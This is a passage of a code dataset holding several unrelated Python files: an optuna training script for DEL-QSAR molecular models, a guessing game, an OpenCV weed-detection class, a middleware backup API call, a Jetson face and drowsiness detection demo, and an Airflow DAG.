rate')\nflags.DEFINE_integer('num_workers', 40, 'Number of workers for loading data')\n\nflags.DEFINE_string('out', None, 'Experiment label (subfolder)')\n\nflags.DEFINE_string('device', 'cuda:0', 'Device (set to cuda:0 if using GPU)')\n\nflags.DEFINE_integer('n_trials', 1, 'Number of optuna trials to run')\n\nif not os.path.isdir(os.path.join(DELQSAR_ROOT, 'experiments', 'results')):\n os.mkdir(os.path.join(DELQSAR_ROOT, 'experiments', 'results'))\n \ndt = datetime.today()\nDATE = os.path.join(DELQSAR_ROOT, 'experiments', 'results', \n f'{dt.year}-{str(dt.month).zfill(2)}-{str(dt.day).zfill(2)}')\nif not os.path.isdir(DATE):\n os.mkdir(DATE)\n\n \ndef objective(trial):\n start = time() \n \n INIT_LR = FLAGS.lr\n DROPOUT = FLAGS.dropout\n DEPTH = FLAGS.depth\n HIDDEN_SIZE = FLAGS.hidden_size\n FFN_NUM_LAYERS = FLAGS.ffn_num_layers\n\n SAVE_ROOT = os.path.join(DATE, FLAGS.out)\n if not os.path.isdir(SAVE_ROOT):\n os.mkdir(SAVE_ROOT)\n \n SAVE_SUBFOLDER = os.path.join(SAVE_ROOT, '1_log_files')\n if not os.path.isdir(SAVE_SUBFOLDER):\n os.mkdir(SAVE_SUBFOLDER)\n \n LOG_FILE = os.path.join(SAVE_SUBFOLDER, 'run.log')\n \n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s: %(message)s',\n handlers=[\n logging.StreamHandler(sys.stdout),\n ]\n )\n with open(LOG_FILE, 'a') as lf:\n logging.info(f'Trial #{trial.number}')\n lf.write(f'{datetime.now()} INFO: Trial #{trial.number}\\n')\n logging.info(f'Parameters: {trial.params}')\n lf.write(f'{datetime.now()} INFO: Parameters: {trial.params}\\n\\n')\n logging.info('FLAGS:')\n lf.write(f'{datetime.now()} INFO: FLAGS:\\n')\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n logging.info(f.serialize())\n lf.write(f'{datetime.now()} INFO: ' + f.serialize() + '\\n')\n # GPU?\n logging.info(f'CUDA available? {torch.cuda.is_available()}')\n lf.write(f'{datetime.now()} INFO: CUDA available? 
{torch.cuda.is_available()}\\n')\n\n # Get data\n df_data = pd.read_csv(os.path.join(DELQSAR_ROOT, 'experiments', 'datasets', FLAGS.csv))\n if 'triazine' in FLAGS.csv:\n for col in df_data.columns:\n if ' ' in col:\n df_data = df_data.rename(columns={col: col.replace(' ', '_')})\n\n # Extract counts\n exp_counts = np.array(df_data[FLAGS.exp], dtype='int')\n bead_counts = np.array(df_data[FLAGS.beads], dtype='int')\n exp_tot = np.sum(exp_counts, axis=0) # column sums\n bead_tot = np.sum(bead_counts, axis=0)\n logging.info(f'{len(df_data)} total compounds')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {len(df_data)} total compounds\\n')\n\n # Featurizer\n smis = df_data['smiles']\n targets = []\n for i in range(exp_counts.shape[0]):\n targets_for_compound = []\n for j in range(exp_counts.shape[1]): \n targets_for_compound.append(R_from_z(bead_counts[i, j], bead_tot[j], \n exp_counts[i, j], exp_tot[j], 0).tolist())\n targets.append(targets_for_compound)\n featurizer = featurizers.GraphFeaturizer(smis, targets)\n x = featurizer.prepare_x()\n\n # Define different splits\n if FLAGS.splitter[0] == 'random':\n splitter = splitters.RandomSplitter()\n train_slice, valid_slice, test_slice = splitter(x, df_data, seed=FLAGS.seed)\n print('Random split:')\n print(f'Train: {train_slice}')\n print(f'Valid: {valid_slice}')\n print(f'Test: {test_slice}')\n with open(LOG_FILE, 'a') as lf:\n lf.write('\\nRandom split:\\n')\n lf.write(f'Train: {train_slice}\\n')\n lf.write(f'Valid: {valid_slice}\\n')\n lf.write(f'Test: {test_slice}\\n\\n')\n else:\n if len(FLAGS.splitter) == 1:\n splitter = splitters.OneCycleSplitter(FLAGS.splitter, LOG_FILE)\n elif len(FLAGS.splitter) == 2:\n splitter = splitters.TwoCycleSplitter(FLAGS.splitter, LOG_FILE)\n elif len(FLAGS.splitter) == 3:\n splitter = splitters.ThreeCycleSplitter(FLAGS.splitter, LOG_FILE)\n else:\n raise ValueError('Unknown splitter')\n train_slice, valid_slice, test_slice = splitter(x, df_data, seed=FLAGS.seed)\n\n logging.info(f'Train length: {len(train_slice):12d}')\n logging.info(f'Valid length: {len(valid_slice):12d}')\n logging.info(f'Test length: {len(test_slice):12d}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Train length: {len(train_slice):12d}\\n')\n lf.write(f'{datetime.now()} INFO: Valid length: {len(valid_slice):12d}\\n')\n lf.write(f'{datetime.now()} INFO: Test length: {len(test_slice):12d}\\n')\n\n # For binary classification: get ground truth labels\n if FLAGS.task_type == 'classification':\n R, R_lb, R_ub = R_ranges(bead_counts[:, 0], bead_tot[0], exp_counts[:, 0], exp_tot[0])\n if FLAGS.threshold_type == 'percentile':\n threshold_R = np.percentile(R[train_slice], FLAGS.threshold_val)\n else:\n threshold_R = FLAGS.threshold_val\n logging.info(f'Threshold (R): {threshold_R}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Threshold (R): {threshold_R}\\n')\n true_labels_R = torch.zeros((len(R),))\n for idx in range(len(R)):\n if R[idx] > threshold_R:\n true_labels_R[idx] = 1\n else:\n true_labels_R = None \n \n # Build model and train\n BATCH_SIZE = 50\n NUM_TASKS = len(FLAGS.exp)\n \n torch.manual_seed(FLAGS.seed)\n if FLAGS.task_type == 'classification':\n model = models.MoleculeModel(init_lr = INIT_LR, max_lr = 10*INIT_LR,\n dataset_type = 'classification',\n final_lr = INIT_LR, depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT, num_tasks = NUM_TASKS,\n device = FLAGS.device, torch_seed=FLAGS.seed)\n\n 
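# train_args mirrors chemprop's parsed-args namespace so that the chemprop.utils.build_optimizer/build_lr_scheduler calls below accept it.\n 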
model.train_args = Namespace(\n dataset_type = 'classification',\n epochs = 30,\n warmup_epochs = 2.0,\n train_data_size = len(train_slice),\n batch_size = BATCH_SIZE,\n init_lr = INIT_LR,\n max_lr = 10*INIT_LR,\n final_lr = INIT_LR,\n depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT,\n num_lrs = 1\n )\n else:\n model = models.MoleculeModel(init_lr = INIT_LR, max_lr = 10*INIT_LR,\n final_lr = INIT_LR, depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT, num_tasks = NUM_TASKS,\n device = FLAGS.device, torch_seed=FLAGS.seed)\n\n model.train_args = Namespace(\n dataset_type = 'regression',\n epochs = 30,\n warmup_epochs = 2.0,\n train_data_size = len(train_slice),\n batch_size = BATCH_SIZE,\n init_lr = INIT_LR,\n max_lr = 10*INIT_LR,\n final_lr = INIT_LR,\n depth = DEPTH,\n hidden_size = HIDDEN_SIZE, \n ffn_num_layers = FFN_NUM_LAYERS,\n dropout = DROPOUT,\n num_lrs = 1,\n )\n model.optimizer = chemprop.utils.build_optimizer(model, model.train_args)\n model.scheduler = chemprop.utils.build_lr_scheduler(model.optimizer, model.train_args)\n \n # Loss function during training\n if FLAGS.task_type == 'classification':\n model.loss_fn_train = losses.loss_fn_BCE\n elif FLAGS.loss_fn_train == 'nlogprob':\n model.loss_fn_train = losses.loss_fn_nlogprob\n elif FLAGS.loss_fn_train == 'MSE': \n model.loss_fn_train = losses.loss_fn_MSE\n else:\n raise ValueError('Unknown loss function for training') \n\n # Loss function during evaluation (only used for regression models)\n model.loss_fn_eval = losses.loss_fn_nlogprob\n \n logging.info(str(model))\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: ' + str(model) + '\\n')\n # Move to GPU?\n model.to(torch.device(FLAGS.device))\n logging.info(f'Moved model to {FLAGS.device}')\n lf.write(f'{datetime.now()} INFO: Moved model to {FLAGS.device}\\n')\n\n try:\n model.train_on_del(\n x, exp_counts, bead_counts, train_slice, valid_slice, true_labels=true_labels_R,\n batch_size=BATCH_SIZE, max_epochs=FLAGS.max_epochs, \n num_workers=FLAGS.num_workers,\n patience=FLAGS.patience, max_norm=FLAGS.max_norm,\n zscale=lambda epoch: 1 + 9*np.exp(-epoch/2),\n device=FLAGS.device, output_size=NUM_TASKS,\n save_path=os.path.join(SAVE_ROOT, f'best_model_trial_{trial.number}.torch'),\n log_path=LOG_FILE,\n torch_seed=FLAGS.seed,\n )\n except KeyboardInterrupt:\n logging.warning('Training interrupted by KeyboardInterrupt!')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} WARNING: Training interrupted by KeyboardInterrupt!\\n')\n \n # Check for NaN loss\n if model.best_val_loss == float('inf'):\n return model.best_val_loss\n \n # Record loss functions\n with open(os.path.join(SAVE_ROOT, f'losses_trial_{trial.number}.csv'), 'w') as fid:\n fid.write('epoch,train_loss,valid_loss\\n')\n for i in range(len(model.all_valid_losses)):\n fid.write(f'{i+1},{np.squeeze(model.all_train_losses[i])}, {np.squeeze(model.all_valid_losses[i])}\\n')\n train_losses_row_sums = np.sum(model.all_train_losses, axis=1)\n valid_losses_row_sums = np.sum(model.all_valid_losses, axis=1)\n\n # Evaluations\n def evaluate_on_slice(test_slice, slice_label='Test'):\n if model.classification:\n test_roc_auc, test_pr_auc, test_preds = model.evaluate_on_del(\n x, exp_counts, bead_counts, test_slice, batch_size=BATCH_SIZE,\n device=FLAGS.device, true_labels=true_labels_R, num_workers=FLAGS.num_workers,\n )\n \n formatted_roc_auc = ['{0:.5f}'.format(roc_auc) for roc_auc in 
np.squeeze(test_roc_auc, axis=0)]\n formatted_pr_auc = ['{0:.5f}'.format(pr_auc) for pr_auc in np.squeeze(test_pr_auc, axis=0)]\n logging.info(f'{slice_label} ({len(test_preds)} compounds) ROC AUC = {np.squeeze(formatted_roc_auc)}')\n logging.info(f'{slice_label} ({len(test_preds)} compounds) PR AUC = {np.squeeze(formatted_pr_auc)}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_preds)} compounds) ROC AUC = {np.squeeze(formatted_roc_auc)}\\n')\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_preds)} compounds) PR AUC = {np.squeeze(formatted_pr_auc)}\\n')\n return test_roc_auc, test_pr_auc, test_preds \n else:\n test_losses, test_enrichments = model.evaluate_on_del(\n x, exp_counts, bead_counts, test_slice, batch_size=BATCH_SIZE,\n num_workers=FLAGS.num_workers, device=FLAGS.device,\n )\n\n avg_test_loss = np.sum(test_losses, axis=0) / test_losses.shape[0]\n formatted_loss = ['{0:.5f}'.format(loss) for loss in avg_test_loss]\n logging.info(f'{slice_label} ({len(test_enrichments)} compounds) average loss = {np.squeeze(formatted_loss)}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {slice_label} ({len(test_enrichments)} compounds) average loss = {np.squeeze(formatted_loss)}\\n')\n\n R = np.zeros((NUM_TASKS, len(test_slice)))\n R_lb = np.zeros((NUM_TASKS, len(test_slice)))\n R_ub = np.zeros((NUM_TASKS, len(test_slice)))\n for i in range(NUM_TASKS):\n _R, _R_lb, _R_ub = R_ranges(bead_counts[test_slice, i], bead_tot[i], \n exp_counts[test_slice, i], exp_tot[i])\n R[i] = _R\n R_lb[i] = _R_lb\n R_ub[i] = _R_ub\n\n test_loss_by_POI = []\n test_enrichment_by_POI = []\n for col in test_losses.T:\n test_loss_by_POI.append(col.tolist())\n for col in test_enrichments.T:\n test_enrichment_by_POI.append(col.tolist())\n test_enrichment_by_POI = np.array(test_enrichment_by_POI)\n\n accuracy_vals = np.zeros((NUM_TASKS, 3))\n for i in range(NUM_TASKS):\n low = np.mean(test_enrichment_by_POI[i] < R_lb[i])\n high = np.mean(test_enrichment_by_POI[i] > R_ub[i])\n within = np.mean((test_enrichment_by_POI[i] < R_ub[i]) & (test_enrichment_by_POI[i] > R_lb[i]))\n accuracy_vals[i] = [low, high, within]\n\n # Report fraction of enrichments within (LB, UB)\n for i, POI in enumerate(FLAGS.exp):\n logging.info(f'{POI}')\n logging.info(f'% predicted R < calculated R: {accuracy_vals[i, 0]:.3%}')\n logging.info(f'% predicted R > calculated R: {accuracy_vals[i, 1]:.3%}')\n logging.info(f'% predicted R in (R_lb, R_ub): {accuracy_vals[i, 2]:.3%}')\n with open(LOG_FILE, 'a') as lf:\n for i, POI in enumerate(FLAGS.exp):\n lf.write(f'{datetime.now()} INFO: {POI}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R < calculated R: {accuracy_vals[i, 0]:.3%}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R > calculated R: {accuracy_vals[i, 1]:.3%}\\n')\n lf.write(f'{datetime.now()} INFO: % predicted R in (R_lb, R_ub): {accuracy_vals[i, 2]:.3%}\\n\\n')\n\n return test_losses, test_enrichments, avg_test_loss, accuracy_vals\n \n # Evaluate on part of train slice\n try:\n evaluate_on_slice(train_slice[:5000], slice_label='Train subset')\n except ValueError as ve:\n logging.info(str(ve))\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} WARNING: {str(ve)}\\n')\n \n # Evaluate on test set\n if model.classification:\n test_roc_auc, test_pr_auc, test_preds = evaluate_on_slice(test_slice, slice_label='Test set')\n else:\n _losses, _enrichments, avg_test_loss, accuracy_vals = evaluate_on_slice(test_slice, slice_label='Test set')\n\n # 
Record to results file\n if not os.path.isfile(RESULTS_FILE):\n with open(RESULTS_FILE, 'w') as fid:\n cols = ['Time (of recording)']\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n flag,value = f.serialize().split('=')\n cols.append(flag[2:])\n cols.append('Training losses')\n cols.append('Validation losses')\n cols.append('Test loss')\n cols.append('% predicted R in (R_lb, R_ub)')\n cols.append('Test ROC AUC')\n cols.append('Test PR AUC')\n fid.write('\\t'.join(cols) + '\\n')\n with open(RESULTS_FILE, 'a') as fid:\n cols = [str(datetime.now().now())]\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n flag,value = f.serialize().split('=')\n cols.append(value)\n cols.append(str(list(np.squeeze(model.all_train_losses))))\n cols.append(str(list(np.squeeze(model.all_valid_losses))))\n if model.classification:\n cols.append('')\n cols.append('')\n cols.append(str(np.squeeze(test_roc_auc)))\n cols.append(str(np.squeeze(test_pr_auc)))\n else:\n cols.append(str(np.squeeze(avg_test_loss)))\n acc_vals = accuracy_vals[:, 2]\n formatted_acc_vals = ['{0:.3%}'.format(val) for val in acc_vals]\n print(formatted_acc_vals)\n cols.append(f'{np.squeeze(formatted_acc_vals)}')\n cols.append('')\n cols.append('')\n fid.write('\\t'.join(cols) + '\\n')\n fid.close()\n \n total = time() - start\n m, s = divmod(total, 60)\n h, m = divmod(int(m), 60)\n logging.info(f'Total time for trial #{trial.number}: {h}h {m}m {s:0.2f}s\\n')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Total time for trial #{trial.number}: {h}h {m}m {s:0.2f}s\\n\\n')\n lf.close()\n \n return model.best_val_loss\n \ndef main(argv):\n del argv\n study = optuna.create_study()\n study.optimize(objective, n_trials=FLAGS.n_trials)\n\n SAVE_ROOT = os.path.join(DATE, FLAGS.out)\n if not os.path.isdir(SAVE_ROOT):\n os.mkdir(SAVE_ROOT)\n \n SAVE_SUBFOLDER = os.path.join(SAVE_ROOT, '1_log_files')\n if not os.path.isdir(SAVE_SUBFOLDER):\n os.mkdir(SAVE_SUBFOLDER)\n \n LOG_FILE = os.path.join(SAVE_SUBFOLDER, 'run.log')\n TRIALS_LOG = os.path.join(SAVE_SUBFOLDER, 'trials.csv')\n \n trial = study.best_trial\n with open(LOG_FILE, 'a') as lf:\n print('Number of trials: {}'.format(len(study.trials)))\n lf.write(f'\\n{datetime.now()} INFO: ' + 'Number of trials: {}'.format(len(study.trials)) + '\\n')\n \n print(f'Best trial: Trial #{trial.number}')\n lf.write(f'{datetime.now()} INFO: Best trial: Trial #{trial.number}\\n') \n \n print(' Value: {}'.format(trial.value))\n lf.write(f'{datetime.now()} INFO: ' + ' Value: {}'.format(trial.value) + '\\n') \n \n print(' Params: ')\n lf.write(f'{datetime.now()} INFO: ' + ' Params: \\n')\n for key, value in trial.params.items():\n print(' {}: {}'.format(key, value))\n lf.write(f'{datetime.now()} INFO: ' + ' {}: {}'.format(key, value) + '\\n')\n lf.close()\n \n study.trials_dataframe().to_csv(TRIALS_LOG, sep='\\t', index=False)\n \n os.rename(os.path.join(SAVE_ROOT, f'losses_trial_{trial.number}.csv'), \n os.path.join(SAVE_SUBFOLDER, f'losses_trial_{trial.number}.csv'))\n os.rename(os.path.join(SAVE_ROOT, f'best_model_trial_{trial.number}.torch'), \n os.path.join(SAVE_SUBFOLDER, f'best_model_trial_{trial.number}.torch'))\n \nif __name__ == '__main__':\n app.run(main)\n logging.shutdown()\n","sub_path":"experiments/triazine_MPN.py","file_name":"triazine_MPN.py","file_ext":"py","file_size_in_byte":21050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161531051","text":"# This is a guess the number game.\r\n\r\n# Import random 
library\r\nimport random\r\n\r\n# initialize guessesTaken to 0\r\nguessesTaken = 0\r\n\r\n\r\n\r\nprint('Hello! What is your name?\\n')\r\n\r\nmyName = input()\r\n\r\nnumber = random.randint(1, 10)\r\n\r\nprint('Well, ' + myName + ', I am thinking of a number between 1 and 10. Guess my number.')\r\n\r\n\r\n# checks the number of guesses taken\r\nwhile guessesTaken < 6:\r\n\r\n print('Take a guess.')\r\n\r\n guess = int(input())\r\n\r\n # add 1 after every guess\r\n guessesTaken = guessesTaken + 1\r\n\r\n # checking the conditions\r\n if guess < number:\r\n\r\n print('Your guess is too low.')\r\n\r\n\r\n\r\n if guess > number:\r\n\r\n print('Your guess is too high.')\r\n\r\n\r\n\r\n if guess == number:\r\n break\r\n\r\n# If the user guessed the number within the allowed tries\r\nif guess == number:\r\n\r\n guessesTaken = str(guessesTaken)\r\n\r\n print('Great, ' + myName + '! You guessed my number in ' + guessesTaken + ' guesses!')\r\n\r\n# if the user ran out of guesses\r\nif guess != number:\r\n number = str(number)\r\n print('Nope. The number I was thinking of was ' + number)","sub_path":"Day_2/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"406351819","text":"import cv2\nimport numpy as np\n\nclass WEEDS:\n def __init__(self, imgPath, reSize=(250,250)):\n image = cv2.imread(imgPath)\n self.image = cv2.resize(image, reSize, interpolation = cv2.INTER_AREA)\n self.colorSpace = cv2.COLOR_BGR2LAB\n\n def displayImage(self, title=\"Image Display\", image=None):\n if image is None:\n cv2.imshow(title, self.image)\n else:\n cv2.imshow(title, image)\n\n def waitClose(self):\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n def applyMask(self, r=55):\n maskPlant = np.zeros(self.image.shape[:2], dtype=\"uint8\")\n cv2.circle(maskPlant, (125, 65), r, 255, -1)\n cv2.circle(maskPlant, (225, 75), r, 255, -1)\n cv2.circle(maskPlant, (320, 35), r, 255, -1)\n cv2.circle(maskPlant, (140, 245), r, 255, -1)\n cv2.circle(maskPlant, (255, 245), r, 255, -1)\n cv2.circle(maskPlant, (365, 210), r, 255, -1)\n\n self.image = cv2.bitwise_not(self.image, self.image, mask=maskPlant)\n\n def applyBlur(self, strong=(3,3)):\n self.image = cv2.GaussianBlur(self.image, strong, 0)\n\n def getImage(self):\n return self.image\n\n def extractWeeds_all(self, b_threshold=80, a_threshold=80):\n zeros = np.zeros(self.image.shape[:2], dtype = \"uint8\")\n\n imgLAB = cv2.cvtColor(self.image, self.colorSpace)\n (L, A, B) = cv2.split(imgLAB)\n\n (T_weeds_b, thresh_weeds_b) = cv2.threshold(B, b_threshold, 255, cv2.THRESH_BINARY)\n (T_weeds_a, thresh_weeds_a) = cv2.threshold(A, a_threshold, 255, cv2.THRESH_BINARY)\n imgRGB = cv2.merge([zeros, thresh_weeds_b, thresh_weeds_a])\n self.image = imgRGB\n\n def countPlantArea(self):\n image = self.image\n width = image.shape[1]\n height = image.shape[0]\n greenArea = 0.0\n \n for pixel_w in range(0, width, 1):\n for pixel_h in range(0, height, 1):\n (b, g, r) = image[pixel_h, pixel_w]\n if((b+g+r)>0):\n greenArea += 1 \n\n plantArea = greenArea / (width*height)\n ratio = str(int(plantArea * 100)) + \"%\"\n cv2.putText(image, ratio, (width-150, 50), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 1, 126), 5)\n self.image = image\n\n def extractWeeds(self, threshold=80, channel=\"B\"):\n zeros = np.zeros(self.image.shape[:2], dtype = \"uint8\")\n\n imgLAB = cv2.cvtColor(self.image, self.colorSpace)\n (L, A, B) = cv2.split(imgLAB)\n\n if(channel==\"B\"):\n selectedChannel = B\n elif(channel==\"L\"):\n
selectedChannel = L\n elif(channel==\"A\"):\n selectedChannel = A\n\n (T_weeds, thresh_weeds) = cv2.threshold(selectedChannel, threshold, 255, cv2.THRESH_BINARY)\n imgRGB = cv2.merge([zeros, thresh_weeds, zeros])\n self.image = imgRGB\n #imgGray = cv2.cvtColor(imgRGB, cv2.COLOR_BGR2GRAY)\n","sub_path":"lib/libFarm.py","file_name":"libFarm.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"348090939","text":"from auc.baseusecase import BaseUseCase\nfrom robot.api import logger\nfrom conf.restConstants import *\nimport requests as req\n\n\nclass MiddlewareEnableBackup(BaseUseCase):\n def test_execute_middleware_enable_backup(self):\n \"\"\"\n Function to enable the filesystem backup for a given VM.\n\n Args:\n tenant_id (mandatory): String\ttenant uuid in xstream\n vm_id (mandatory): String vm uuid in xstream\n hostname (mandatory): String hostname of the vm\n retention_days (mandatory): Int no. of retention days\n callback_url (mandatory): String\n Returns:\n Function returns Status Code from the REST API response.\n Following status codes can be returned\n 200: OK\n 404: NOT FOUND\n 401: UNAUTHORIZED\n 500: INTERNAL SERVER ERROR\n \"\"\"\n enable_backup_data = {'TenantID': self.ctx_in['tenant_id'],\n 'VirtualMachineID': self.ctx_in['vm_id'],\n 'VirtualMachineHostName': self.ctx_in['hostname'],\n 'RetentionDays': self.ctx_in['retention_days'],\n 'Callback': self.ctx_in['callback_url']\n }\n try:\n enable_backup_resp = req.post(MIDDLEWARE_ENABLE_BACKUP.format(self.ctx_in['mw_service_host']),\n json=enable_backup_data,\n headers=MIDDLEWARE_SERVICE_HEADER)\n self.ctx_out = True\n except Exception as e:\n logger.info(\"Exception occurred while calling Enable Backup API. 
\\n \"\n \"Backup enabling did not happen.\\nException: %s\" % e)\n self.ctx_out = False\n return 0\n\n logger.info(\"Status Code = %s\" % enable_backup_resp.status_code)\n logger.info(\"Message = %s\" % enable_backup_resp.text)\n self.ctx_out = enable_backup_resp.status_code\n return enable_backup_resp.status_code\n\n def run_test(self):\n sc = self.test_execute_middleware_enable_backup()\n return sc\n\n def _finalize_context(self):\n assert self.ctx_out == 200, 'Could not enable backup'\n","sub_path":"automation_framework/auc/middleware_enable_backup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468088457","text":"\"\"\"trt_mtcnn.py\n\nThis script demonstrates how to do real-time face detection with\nCython wrapped TensorRT optimized MTCNN engine.\n\"\"\"\n\nimport sys\nimport time\nimport argparse\n\nimport cv2\nfrom utils.camera import add_camera_args, Camera\nfrom utils.display import open_window, set_display, show_fps\nfrom utils.mtcnn import TrtMtcnn\nfrom keras.models import load_model\nimport numpy as np\n\nemotion_dict = {0: 'angry', 1: 'happy', 2: 'neutral', 3: 'sad'}\nsleep_dict = {0: \"awake\", 1: \"drowsy\"}\n\nmodel = load_model(\"./whole_model.hdf5\")\nWINDOW_NAME = 'TrtMtcnnDemo'\nBBOX_COLOR = (0, 255, 0) # green\ncount = 1\nsleep_prev = str(\"awake\")\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n desc = ('Capture and display live camera video, while doing '\n 'real-time face detection with TrtMtcnn on Jetson '\n 'Nano')\n parser = argparse.ArgumentParser(description=desc)\n parser = add_camera_args(parser)\n parser.add_argument('--minsize', type=int, default=40,\n help='minsize (in pixels) for detection [40]')\n args = parser.parse_args()\n return args\n\n\ndef show_faces(img, boxes, landmarks):\n \"\"\"Draw bounding boxes and face landmarks on image.\"\"\"\n global sleep_prev\n global count\n img1 = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n for bb, ll in zip(boxes, landmarks):\n x1, y1, x2, y2 = int(bb[0]), int(bb[1]), int(bb[2]), int(bb[3])\n #################################\n roi_color = img1[y1:y2, x1:x2, :]\n cropped_img = np.expand_dims(cv2.resize(roi_color, (224, 224)), 0)\n prediction2 = model.predict(cropped_img)\n sleep = prediction2[0]\n emotion = prediction2[1]\n print(emotion_dict[int(np.argmax(emotion))] , \"\\n\" , sleep_dict[int(np.argmax(sleep))] )\n ################################\n cv2.rectangle(img, (x1, y1), (x2, y2), (206, 174, 17), 1)\n sleep = sleep_dict[int(np.argmax(prediction2[0]))]\n emotion = emotion_dict[int(np.argmax(prediction2[1]))]\n\n if sleep == \"drowsy\" and sleep == sleep_prev:\n count = count+1\n sleep_prev = sleep\n if count > 10:\n cv2.rectangle(img, (x2 + 20, y1+ 40), (x2 + 120, y1 + 55), (28, 13, 191), 13)\n cv2.putText(img, \"ALERT!!\", (x2 + 32, y1 + 54), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n else:\n sleep_prev = sleep\n count = 1\n\n cv2.rectangle(img, (x2 + 20, y1 + 5), (x2 + 120, y1 + 20), (206, 174, 17), 13)\n cv2.putText(img, emotion, (x2 + 32, y1 + 18), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n\n if sleep == \"awake\":\n cv2.rectangle(img, (x2 + 20, y1 + 40), (x2+ 120, y1 + 55), (206, 174, 17), 13)\n cv2.putText(img, sleep, (x2 + 32, y1 + 53), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n elif sleep == \"drowsy\" and count <= 10:\n cv2.rectangle(img, (x2 + 20, y1 + 40), (x2 + 120, y1 + 55), (14, 
88, 235), 13)\n cv2.putText(img, sleep, (x2 + 32, y1 + 53), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 1,\n cv2.LINE_AA)\n return img\n\n\ndef loop_and_detect(cam, mtcnn, minsize):\n \"\"\"Continuously capture images from camera and do face detection.\"\"\"\n full_scrn = False\n fps = 0.0\n tic = time.time()\n while True:\n if cv2.getWindowProperty(WINDOW_NAME, 0) < 0:\n break\n img = cam.read()\n if img is not None:\n dets, landmarks = mtcnn.detect(img, minsize=minsize)\n print('{} face(s) found'.format(len(dets)))\n img = show_faces(img, dets, landmarks)\n img = show_fps(img, fps)\n cv2.imshow(WINDOW_NAME, img)\n toc = time.time()\n curr_fps = 1.0 / (toc - tic)\n # calculate an exponentially decaying average of fps number\n fps = curr_fps if fps == 0.0 else (fps*0.95 + curr_fps*0.05)\n tic = toc\n key = cv2.waitKey(1)\n if key == 27: # ESC key: quit program\n break\n elif key == ord('F') or key == ord('f'): # Toggle fullscreen\n full_scrn = not full_scrn\n set_display(WINDOW_NAME, full_scrn)\n\n\ndef main():\n args = parse_args()\n cam = Camera(args)\n cam.open()\n if not cam.is_opened:\n sys.exit('Failed to open camera!')\n\n mtcnn = TrtMtcnn()\n\n cam.start()\n open_window(WINDOW_NAME, args.image_width, args.image_height,\n 'Camera TensorRT MTCNN Demo for Jetson TX2')\n loop_and_detect(cam, mtcnn, args.minsize)\n\n cam.stop()\n cam.release()\n cv2.destroyAllWindows()\n\n del(mtcnn)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Face_Detection_Models/MTCNN/demo_VggFace_mtcnn_jetsontx2.py","file_name":"demo_VggFace_mtcnn_jetsontx2.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241517356","text":"from datetime import timedelta\n\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\n\nargs = {\n 'owner': 'Airflow',\n 'start_date': airflow.utils.dates.days_ago(2),\n}\n\ndag = DAG(\n dag_id='dag_2_training_id',\n default_args=args,\n schedule_interval=None,\n dagrun_timeout=timedelta(minutes=60),\n)\n\ndef print_context(execution_date, **context):\n print(execution_date)\n\nPythonOp = PythonOperator(\n task_id='PythonOp',\n provide_context=True,\n python_callable=print_context,\n dag=dag,\n)\n\nBashOp_1 = BashOperator(\n task_id='BashOp_1',\n bash_command='sleep 1',\n dag=dag,\n)\n\nBashOp_2 = BashOperator(\n task_id='BashOp_2',\n bash_command='sleep 5',\n dag=dag,\n)\n\nBashOp_3 = BashOperator(\n task_id='BashOp_3',\n bash_command='sleep 10',\n dag=dag,\n)\n\nDummyOp = DummyOperator(\n task_id='DummyOp',\n dag=dag,\n)\n\nPythonOp >> [BashOp_1,BashOp_2,BashOp_3] >> DummyOp 